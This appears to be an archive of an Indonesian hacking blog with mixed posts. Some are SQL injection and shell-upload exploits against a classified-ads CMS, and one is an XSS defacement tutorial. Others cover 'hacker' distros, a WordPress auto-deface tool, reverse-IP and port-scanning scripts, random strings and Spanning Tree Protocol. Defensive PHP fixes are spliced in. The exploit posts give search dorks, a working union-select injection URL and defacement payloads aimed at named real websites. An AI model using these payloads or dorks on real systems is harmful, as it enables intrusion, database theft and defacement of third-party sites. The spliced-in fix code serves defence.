Saturday, 31 October 2015

hack CMS IKLAN BARIS



Assalamu’alaikum wr.wb..
Alhamdulillah, I can be active in the underground again, hehehe..
This time kk minato wants to invite friends to party a little :v .. let's get straight to it..
##############SQL CMS IKLAN BARIS#####################
# Dork :: inurl:“kategori.php?premium=” or just develop it further.. ;)
Vulnerable code found in kategori.php
$id          = $_GET['id'];
$id_kategori = $_GET['kategori'];
$qryISI_kat  = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");
$recISI_kat  = fetch_array($qryISI_kat);

$id_iklan_premium = $_GET['premium'];
$id_iklan_gratis  = $_GET['gratis'];

$qryISI_premium = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");
$recISI_premium = fetch_array($qryISI_premium);

$qryISI_gratis = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");
$recISI_gratis = fetch_array($qryISI_gratis);
As you can see, there is no filtering there.. XD
Demo:
the vulnerable column is in the title,
 http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -
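The fix for the pattern shown in kategori.php, as an added example (not code from the CMS or from the original post): the same lookup with the request value validated and bound as a parameter instead of concatenated into the WHERE clause. The `find_by_id()` helper, the identifier map and the in-memory SQLite sample data are assumptions standing in for the CMS's `select_db()` and its database.

```php
<?php
// Added example: parameterized replacement for the concatenated WHERE
// clauses in kategori.php. find_by_id() and the sample schema are
// hypothetical; the table and column names are the ones visible in the post.

// Identifiers cannot be bound as parameters, so they come from a fixed map.
const ID_COLUMNS = [
    'kategori_iklan' => 'id_kategori',
    'iklan_premium'  => 'id_iklan_premium',
    'iklan_gratis'   => 'id_iklan_gratis',
];

function find_by_id(PDO $pdo, string $table, $raw_id): ?array
{
    if (!isset(ID_COLUMNS[$table])) {
        throw new InvalidArgumentException("unknown table: $table");
    }
    // The ids are numeric keys: anything that is not a plain positive
    // integer (including arrays and missing values) never reaches the database.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $col  = ID_COLUMNS[$table];
    $stmt = $pdo->prepare("SELECT * FROM $table WHERE $col = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- constructed demo data; in-memory SQLite stands in for the real database.
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE kategori_iklan (id_kategori INTEGER PRIMARY KEY, nama TEXT)');
$pdo->exec("INSERT INTO kategori_iklan VALUES (3, 'Properti')");

// Simulated $_GET['kategori'] values: a normal id, then a quote-breaking
// value of the kind shown in the demo above (shortened).
foreach (['3', "3' and 0 union select 1,2,3-- -"] as $input) {
    $row = find_by_id($pdo, 'kategori_iklan', $input);
    printf("%-34s => %s\n", $input, $row ? $row['nama'] : 'rejected / not found');
}
```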
#########arbitrary file upload CMS IKLAN BARIS ###################
File //iklan_gratis.php
$img = $_FILES['gambar']['type'];
$imgtype = strtolower($img);
/* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){
    alert('File gambar tidak dikenali!!!');
} */

NB:: The filter was thrown away by the programmer XD
Demo::

Post a free ad.. fill in the boxes with anything..
Then upload a file with the extension,… shell.php.xxxjpg
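What a working check in iklan_gratis.php could look like, as an added example (not code from the CMS or from the original post). It ignores the client-supplied `$_FILES[...]['type']` that the commented-out filter relied on and checks the final extension, the content type detected from the bytes and whether the file decodes as an image; the function name, the allowlist, `UPLOAD_DIR` and the sample files are assumptions.

```php
<?php
// Added example: server-side checks for the 'gambar' upload field.
// check_image_upload() and the allowlist are hypothetical, not CMS code.

const ALLOWED_IMAGES = [   // final extension => MIME type detected from content
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

// Returns a server-generated file name, or throws with the reason for rejection.
function check_image_upload(string $client_name, string $tmp_path, int $max_bytes = 2097152): string
{
    $size = @filesize($tmp_path);
    if ($size === false || $size === 0 || $size > $max_bytes) {
        throw new RuntimeException('missing, empty or oversized file');
    }
    // 1. Only the final extension counts, and it must be on the allowlist.
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        throw new RuntimeException("extension not allowed: .$ext");
    }
    // 2. Refuse a script extension anywhere in the name (foto.php.gif):
    //    some web-server handler configurations execute such files.
    if (preg_match('/\.(php\d*|phtml|phar|cgi|pl|py|asp|aspx|jsp)(\.|$)/i', $client_name)) {
        throw new RuntimeException('script extension in file name');
    }
    // 3. The type is detected from the bytes, never taken from $_FILES[..]['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path);
    if ($mime !== ALLOWED_IMAGES[$ext]) {
        throw new RuntimeException("content is $mime, not " . ALLOWED_IMAGES[$ext]);
    }
    // 4. The file must also decode as an image.
    if (@getimagesize($tmp_path) === false) {
        throw new RuntimeException('not a decodable image');
    }
    // 5. The client's name is never reused on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// In the upload handler (not run here; UPLOAD_DIR is a hypothetical
// directory outside the web root):
//   $f = $_FILES['gambar'];
//   if ($f['error'] === UPLOAD_ERR_OK && is_uploaded_file($f['tmp_name'])) {
//       $name = check_image_upload($f['name'], $f['tmp_name']);
//       move_uploaded_file($f['tmp_name'], UPLOAD_DIR . '/' . $name);
//   }

// --- constructed sample files: a 1x1 GIF and a text file that is not an image
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
$txt = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($txt, "<?php /* constructed placeholder, not an image */\n");

$cases = [
    ['foto.gif', $gif],             // accepted
    ['shell.php.xxxjpg', $txt],     // the file name used in the post
    ['foto.php.gif', $gif],         // image bytes, script extension in the name
    ['foto.gif', $txt],             // image name, non-image content
];
foreach ($cases as [$name, $path]) {
    try {
        printf("%-18s accepted, stored as %s\n", $name, check_image_upload($name, $path));
    } catch (RuntimeException $e) {
        printf("%-18s rejected: %s\n", $name, $e->getMessage());
    }
}
unlink($gif);
unlink($txt);
```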
Below are the targets I got from my auto scanner.. enjoy.. let's rock Indonesian CMS XD

Wait for the next update, okay... there are many secrets we will study ^_^
Greetings from the Sec7or family

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities
Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
browser : Mozilla Firefox 




1). Go to Google and type the dork "inurl:error.php?error=".
In the search results, ignore all the extra results with a different URL, like: error-php-error.php
Pick only sites with a URL of the form www.site.com/error.php?error=

2). Now type your first tag to check for the vulnerability.
Example: www.site.com/error.php?error=<h1>Test</h1>
If it shows the word "Test" in a header tag, then it is vulnerable.

Here are a few ways in which you can inject your XSS vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>

You can add more HTML and JavaScript tags here.
Here is another demo site:
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
Find more websites with dorks :)

If you have any queries, feel free to comment below :)
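How an `error.php` of this kind can be written so that the probes above render as inert text, as an added example (not code from any of the sites mentioned or from the original post): the `error` parameter is treated as a lookup key, and anything echoed back is HTML-encoded at the point of output. The message table and function names are assumptions.

```php
<?php
// Added example: an error page that does not reflect markup.
// ERROR_MESSAGES, h(), render_error_page() and send_error_page() are
// hypothetical names.

const ERROR_MESSAGES = [
    '404' => 'The page you requested was not found.',
    '403' => 'You do not have permission to view this page.',
    '500' => 'Something went wrong on our side.',
];

// Encode for an HTML text or quoted-attribute context.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_error_page($raw): string
{
    // ?error[]=x arrives as an array; anything that is not a string is dropped.
    $key = is_string($raw) ? $raw : '';
    if (isset(ERROR_MESSAGES[$key])) {
        $message = ERROR_MESSAGES[$key];            // fixed server-side text
    } else {
        // Unknown value: show at most 64 bytes of it. A multibyte character
        // cut in half here is replaced by ENT_SUBSTITUTE in h().
        $message = 'Unknown error: ' . substr($key, 0, 64);
    }
    return "<!doctype html>\n<html><head><meta charset=\"utf-8\">"
         . '<title>Error</title></head><body><p>' . h($message) . "</p></body></html>\n";
}

function send_error_page($raw): void
{
    // Defence in depth: inline script stays blocked even if an encoding
    // call is missed somewhere else on the page.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
    header('X-Content-Type-Options: nosniff');
    header('Content-Type: text/html; charset=utf-8');
    echo render_error_page($raw);
}

// In error.php itself: send_error_page($_GET['error'] ?? '');

// Constructed demo: a known code, then two of the probes from the post.
foreach (['404', '<h1>Test</h1>', '<script>alert("hello");</script>'] as $probe) {
    echo render_error_page($probe), "\n";
}
```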



Friday, 30 October 2015

Top 5 "Hacker" Friendly Operating Systems


Top 5 "Hacker" Friendly Operating Systems: Hello everyone! Most of my readers asked me which is the best operating system for hacking activities, such as hacking websites, wireless networks and passwords, network sniffing, reverse engineering, application hacking, and other encrypting and spoofing hacking. So I thought of writing an article on this. In this article I will be sharing some information about awesome hacking operating systems (OS) ;) ...

Here is the list of the Top 5 Hacker Friendly Operating Systems we are going to discuss:
  1. Kali Linux
  2. BackTrack 5
  3. BugTraq
  4. BlackBuntu
  5. DEFT

So let's come to our topic. Below is the full list of the top 5 hacker friendly operating systems. If you are a hacker you can use them, and if not, you can become one by using them ;) .. so here it starts! ...

#1 Kali Linux


Kali Linux is based on Debian rather than Ubuntu, and its new streamlined repositories synchronize with the Debian repositories 4 times each day, continually providing users with the latest package updates and security fixes available.

More than 300 penetration testing tools, completely free and open source, wide wireless device support, GPG-signed packages and repos, multi-language support and full customizability make this distribution one of the best gems available to the hacking community.

You can download Kali Linux from the link given below :)


NOTE: Default root password is same "root" :)

#2 BackTrack 5




BackTrack is a Linux OS intended for security professionals who work on system and web application security and other fields such as digital forensics.

This operating system includes all the security assessment tools and features to date. This distro has it all: a slick interface, powerful and up-to-date tools, a large software library and tons of tutorials.

You can download BackTrack from the link below!



#3 BugTraq


BugTraq offers the most comprehensive, optimal, stable and automated security distribution to date. Bugtraq is a distribution based on the 2.6.38 kernel and has a wide range of penetration testing and forensic tools. Bugtraq can be installed from a Live DVD or USB drive; the distribution is customized down to the last package, and the kernel has been configured, updated and patched for better performance and to recognize a variety of hardware, including wireless injection patches for pentesting that other distributions do not recognize.

Administrative improvements of the system for better management of services. Expanded range of recognition for wireless injection drivers. Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...

Awesome scripts from the Bugtraq-Team (SVN update tools, track erasers, backdoors, Spyder-sql, and so on). Stability and performance optimized: improved Flash and Java performance, and unnecessary services are removed at startup, so that the user runs only the services they really need. User creation has been incorporated into the installation, and the user is created with all system configurations.


#4 BlackBuntu



Blackbuntu is a distribution for penetration testing that was specially designed for security training students and practitioners of information security. It is currently being built using Xubuntu 12.04. This release has an extensive software library and almost 100000's of tutorials floating around on YouTube and other sites. Blackbuntu runs on any PC, new or old, because of its low requirements. The main developer, Krit Kadnok, says "It's made time permitting as a hobby." Get Blackbuntu Here




#5 DEFT (Digital Evidence & Forensic Toolkit.)


DEFT (acronym for Digital Evidence and Forensic Toolkit) is a Xubuntu Linux-based computer forensics live CD. It is designed to meet the needs of police, investigators, system administrators and computer forensics specialists.

DEFT Linux v5 is based on the new kernel 2.6.31 (Linux side) and DEFT Extra 2.0 (computer forensics GUI) with the best freeware Windows computer forensics tools. DEFT is a new concept of computer forensics live system that uses LXDE as its desktop environment, the Thunar file manager, and mount manager as its tool for device management.

It is an easy-to-use system that includes excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.

DEFT is meant to be used by:
  • police
  • investigators
  • system administrators
  • individuals

and all the people who need to use forensic tools but do not know the open source operating systems and forensic techniques. Get this Swiss knife of the PC world Here


Tuesday, 27 October 2015

Config and Auto Deface in WordPress

Config and Auto Deface in WordPress..

No need to tire yourself out looking for the config + getting into the database, changing the admin u/p, logging in, planting a shell, defacing..

because all of those features are in this tool..
just 1 click...



*nb:
change $nick.

If there is no token.. then just leave it..
If there is a token and the deface does not succeed.. try doing it manually..

Monday, 26 October 2015

Script Auto Reverse IP Lookup With Python

Hi bro ...
This time I want to share an Auto Reverse IP Lookup script written in Python. Using a website for this is ordinary, so how about using a Python script, that's extraordinary :p wkwkw. Okay, let's continue ..

Here is the script


import re
import urllib.request


# Decoded by DayWalker
# Contact : rafsanzani.suhada99[at]gmail[dot]com
# How to use
# Target : facebook.com <-- Target
# Ported to Python 3 (urllib.request, input(), print()); indentation restored.


class reverse(object):
    def run(self, target):
        print("")
        # Strip the scheme so that only the host name is sent to the lookup service
        if target.startswith("http://"):
            target = target.replace("http://", "")
        elif target.startswith("https://"):
            target = target.replace("https://", "")

        url = "http://viewdns.info/reverseip/?host=%s&t=1" % (target)

        try:
            opener = urllib.request.build_opener()
            opener.addheaders = [('User-agent', 'Mozilla/5.0 (Mobile; rv:14.0) Gecko/14.0 Firefox/14.0')]
            response = opener.open(url)
            # The response body is bytes in Python 3; decode before matching
            data = response.read().decode("utf-8", "replace")
            # Each result row starts with a table cell holding the domain
            comp = re.compile(r"<tr><td>\S+</td><td")
            baglantilar = comp.findall(data)

            for i in baglantilar:
                i = i.replace("<tr><td>", "").replace("</td><td", "")

                if not i.startswith("http://"):
                    i = "http://" + i

                # Skip the table header row
                if "Domain" not in i:
                    print(i)

        except Exception:
            print("Something's went wrong ..")


if __name__ == '__main__':
    a = input("\n\t Target : ")
    reverse().run(a)

    print("\n IndoXploit Coders Team")
# Indoxploit Coders Team


Test screenshot:


Okay, thank you :)
DayWalker

Thx To : IndoXploit Coders Team | IDN-Crew | Madura Cyber Team |

Sunday, 25 October 2015

Tutorial: Generating a Random String with a PHP Script

This time I will share how to generate a random string in PHP. Random strings are commonly used to create coupon codes, confirmation codes, random passwords, etc. Okay, straight to the tutorial.

1. Random String Containing Lowercase Letters and Digits.

<?php
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 7, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 1, 'characters' => '0123456789');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?> 
Save the file as random.php.
Next, create another file named call.php and fill it with the following code:
<?php
include "random.php";
// random_string() takes no arguments
$random = random_string();
print ("$random");
?>

How to call it:
from a Linux terminal, type php call.php
Or it can also be run via localhost.
Example output: rpca6unz
Consists of 8 characters with 7 lowercase letters and 1 digit.
2. Random String Containing Lowercase Letters, Uppercase Letters, Symbols and Digits.
<?php
function random_string()
{
    $character_set_array = array();
    $character_set_array[] = array('count' => 5, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 3, 'characters' => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');
    $character_set_array[] = array('count' => 2, 'characters' => '0123456789');
    $character_set_array[] = array('count' => 2, 'characters' => '!@#$+-*&?:');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
        }
    }
    shuffle($temp_array);
    return implode('', $temp_array);
}
?>
Save it as random.php, then create a call.php file as in number 1.
Example output: q#Q?w22kaZfC
Consists of 12 characters with 5 lowercase letters, 3 uppercase letters, 2 digits and 2 symbols.
Easy, isn't it?
The script above can still be extended as needed, e.g. output consisting only of symbols and digits, uppercase letters and digits, etc.
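`rand()` and `shuffle()` in the scripts above are not cryptographically secure, which matters for the confirmation codes and passwords this tutorial mentions. The same generator built on `random_int()` (PHP 7.1+), with an estimate of how much entropy the fixed composition gives, as an added example rather than code from the original tutorial; `secure_random_string()`, `composition_entropy_bits()` and the parameter layout are assumptions.

```php
<?php
// Added example: same output shape as random_string(), but every random
// choice comes from the operating system's CSPRNG via random_int().
// Function names and the [count, alphabet] layout are hypothetical.

function secure_random_string(array $sets): string
{
    $chars = [];
    foreach ($sets as [$count, $alphabet]) {
        if ($count < 0 || $alphabet === '') {
            throw new InvalidArgumentException('count must be >= 0 and alphabet non-empty');
        }
        $max = strlen($alphabet) - 1;
        for ($i = 0; $i < $count; $i++) {
            $chars[] = $alphabet[random_int(0, $max)];
        }
    }
    // Fisher-Yates shuffle driven by random_int(); shuffle() draws from a
    // non-cryptographic generator.
    for ($i = count($chars) - 1; $i > 0; $i--) {
        $j = random_int(0, $i);
        [$chars[$i], $chars[$j]] = [$chars[$j], $chars[$i]];
    }
    return implode('', $chars);
}

// Entropy in bits of a fixed-composition string, assuming disjoint alphabets:
// log2( n! / (c1! * ... * ck!) * |A1|^c1 * ... * |Ak|^ck )
function composition_entropy_bits(array $sets): float
{
    $log2_factorial = function (int $n): float {
        $sum = 0.0;
        for ($i = 2; $i <= $n; $i++) {
            $sum += log($i, 2);
        }
        return $sum;
    };
    $total = 0;
    $bits  = 0.0;
    foreach ($sets as [$count, $alphabet]) {
        $total += $count;
        $bits  += $count * log(strlen($alphabet), 2) - $log2_factorial($count);
    }
    return $bits + $log2_factorial($total);
}

// The two compositions used in the tutorial.
$schemes = [
    '7 lowercase + 1 digit' => [
        [7, 'abcdefghijklmnopqrstuvwxyz'],
        [1, '0123456789'],
    ],
    '5 lower + 3 upper + 2 digits + 2 symbols' => [
        [5, 'abcdefghijklmnopqrstuvwxyz'],
        [3, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'],
        [2, '0123456789'],
        [2, '!@#$+-*&?:'],
    ],
];
foreach ($schemes as $label => $sets) {
    printf("%-42s %-14s about %.1f bits\n", $label,
        secure_random_string($sets), composition_entropy_bits($sets));
}
```

The entropy figure is an upper bound that only holds when the generator is unpredictable; with `rand()` the effective strength is limited by the generator's seed.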

That's all for this tutorial; I hope it is useful.

Credit : Linux and Security

Thursday, 22 October 2015

How to See a Website's Open Ports With PortScanner (Perl)

Hi bro..
This time I will share how to see a website's open ports with PortScanner (Perl). What is it for? In my opinion, its purpose is to let us see which ports are open. For example port 22: port 22 is SSH, so we can remote into that web server with SSH. There are also 23, 21, etc.


Grab the tool HERE

In the section:
$ip = "localhost" replace localhost with the website (target)

Here is the result:

To find out the names of the ports, just search on Google :p

Friday, 16 October 2015

Spanning Tree Protocol (IEEE 802.1d)

Definition of Spanning Tree Protocol (STP)
The definition of Spanning Tree Protocol (STP) follows from the function of STP itself: its main task is to prevent network loops at layer 2 (switch and bridge devices). STP constantly monitors the network to discover links and makes sure no loops occur by shutting down redundant links.

Spanning Tree Protocol Operation
STP Concepts
  • STP discovers all links in the network and shuts down the redundant ones. STP prevents network loops by electing one switch as the root bridge. The root bridge's ports are called designated ports (forwarding-state ports). A forwarding-state port receives and sends (forwards) traffic.
  • Once one switch has been chosen as the root bridge, the others act as non-root bridges. (see the figure above)
  • The port (on a non-root bridge switch) that has the lowest cost (determined by the link bandwidth) and is connected to a root bridge port (designated port) is called the root port (it also forwards traffic).
  • The port that has been selected and has the lowest path cost to the root bridge is called the designated port. Other ports, or ports on the same path, are considered non-designated (they do not forward traffic) and are said to be in blocking mode. (see the figure above)
Electing the Root Bridge
Switches and bridges exchange STP information using BPDUs (Bridge Protocol Data Units). BPDUs carry configuration messages in multicast frames. Each device's Bridge ID is sent to the other devices using BPDUs.

The Bridge ID is used to determine the root bridge and the root port. The Bridge ID is 8 bytes long and includes the priority and the MAC address of each device.

To determine the root bridge, the device's priority and MAC address are combined. If two switches have the same priority, the MAC address is used to decide: the switch with the lowest MAC address is chosen.
Example: The topology has two switches, identified as SW1 and SW2. Both have the same priority, 32768, so the MAC address is used to determine the root bridge. Here SW1 has MAC address 0000.0c00.1111.1111 and SW2 has MAC address 0000.0c00.2222.2222. SW1 therefore acts as the root bridge because its MAC address is lower than SW2's.
Selecting the Designated Port
To determine which port will be used to communicate with the root bridge, we first need to know what path cost is. The STP cost is the accumulated total path cost based on the bandwidth of the links. To determine the designated port, please reread the explanation above.
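The election and root port selection described above, worked through for a three-switch triangle as an added example (not part of the original article). The switch names, the 48-bit MAC addresses and the link speeds are constructed; the path costs are the IEEE 802.1D-1998 defaults.

```php
<?php
// Added example: root bridge election and root port choice for a
// constructed three-switch triangle. Names, MACs and links are made up.

// IEEE 802.1D-1998 default path cost by link speed in Mb/s
const PATH_COST = [10 => 100, 100 => 19, 1000 => 4, 10000 => 2];

// Bridge ID = 2-byte priority + 6-byte MAC, written as 16 hex digits so
// that plain string comparison orders IDs the way STP does (lowest wins).
function bridge_id(int $priority, string $mac): string
{
    $hex = strtolower(preg_replace('/[^0-9a-f]/i', '', $mac));
    if (strlen($hex) !== 12 || $priority < 0 || $priority > 0xFFFF) {
        throw new InvalidArgumentException("invalid priority or MAC: $priority / $mac");
    }
    return sprintf('%04x', $priority) . $hex;
}

function elect_root(array $ids): string          // $ids: switch name => bridge id
{
    // SORT_STRING matters: hex strings that happen to look numeric would
    // otherwise be compared as numbers.
    asort($ids, SORT_STRING);
    reset($ids);
    return key($ids);
}

// Root path cost per switch: relax every link until nothing changes,
// which is the steady state the BPDU exchange converges to.
function root_path_costs(array $links, array $ids, string $root): array
{
    $cost = array_fill_keys(array_keys($ids), PHP_INT_MAX);
    $cost[$root] = 0;
    do {
        $changed = false;
        foreach ($links as [$a, $b, $mbps]) {
            foreach ([[$a, $b], [$b, $a]] as [$from, $to]) {
                if ($cost[$from] !== PHP_INT_MAX && $cost[$from] + PATH_COST[$mbps] < $cost[$to]) {
                    $cost[$to] = $cost[$from] + PATH_COST[$mbps];
                    $changed = true;
                }
            }
        }
    } while ($changed);
    return $cost;
}

// Root port of $sw: the link with the lowest cost to the root; a tie is
// broken by the lowest neighbour bridge ID. Returns the neighbour's name.
function root_port(string $sw, array $links, array $cost, array $ids): ?string
{
    $best = null;   // [cost via neighbour, neighbour bridge id, neighbour name]
    foreach ($links as [$a, $b, $mbps]) {
        if ($a !== $sw && $b !== $sw) {
            continue;
        }
        $nbr = ($a === $sw) ? $b : $a;
        if ($cost[$nbr] === PHP_INT_MAX) {
            continue;                              // neighbour cannot reach the root
        }
        $cand = [$cost[$nbr] + PATH_COST[$mbps], $ids[$nbr], $nbr];
        if ($best === null || $cand[0] < $best[0]
            || ($cand[0] === $best[0] && strcmp($cand[1], $best[1]) < 0)) {
            $best = $cand;
        }
    }
    return ($cost[$sw] === 0 || $best === null) ? null : $best[2];
}

$ids = [
    'SW1' => bridge_id(32768, '0000.0c00.1111'),
    'SW2' => bridge_id(32768, '0000.0c00.2222'),
    'SW3' => bridge_id(32768, '0000.0c00.3333'),
];
$links = [['SW1', 'SW2', 100], ['SW1', 'SW3', 1000], ['SW2', 'SW3', 1000]];

$root = elect_root($ids);
$cost = root_path_costs($links, $ids, $root);
echo "root bridge: $root\n";
foreach (array_keys($ids) as $sw) {
    printf("%s  bridge id %s  root path cost %d  root port faces %s\n",
        $sw, $ids[$sw], $cost[$sw], root_port($sw, $links, $cost, $ids) ?? '(none, root bridge)');
}
```

SW2 reaches the root more cheaply through SW3 over two gigabit links than over its direct 100 Mb/s link, so its root port faces SW3.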

STP Cost

Spanning-Tree Port States
Ports on a switch or bridge running STP transition through 4 different states:
  1. Blocking means the port does not forward frames. All switch ports are in the blocking state by default when the switch powers on.
  2. Listening means the port listens to BPDUs to make sure there is no loop in the network before passing data frames.
  3. Learning means the port learns MAC addresses and builds the filter table but does not forward frames.
  4. Forwarding means the port sends and receives all data on the bridged port.
Usually, switch ports are in the blocking or forwarding state. A forwarding port is the one determined to have the lowest cost to the root bridge. However, if the network topology changes because one of the switch links fails or the administrator adds a switch to the topology, the switch ports go through the listening and learning states.

Blocking ports are used to prevent loops in the network. Sometimes a switch determines the best path to the root bridge, and then all other ports go into the blocking state until the blocked ports receive BPDUs.

If a switch determines that a blocked port should now become the designated port, the switch puts it into the listening state. After that the switch checks the BPDUs to make sure it will not create a loop once the port goes to the forwarding state.

Convergence
Convergence occurs when switches/bridges have transitioned to either the forwarding or the blocking state. No data is forwarded during this time. Convergence is important to make sure all devices have the same database. Before data is forwarded, all devices must have been updated. This takes 50 seconds, from the blocking to the forwarding state. It is recommended not to change the default STP timers (but the timers can be adjusted if necessary).
Forward delay is the time it takes to move a port from the listening or the learning state to the forwarding state.

STP Example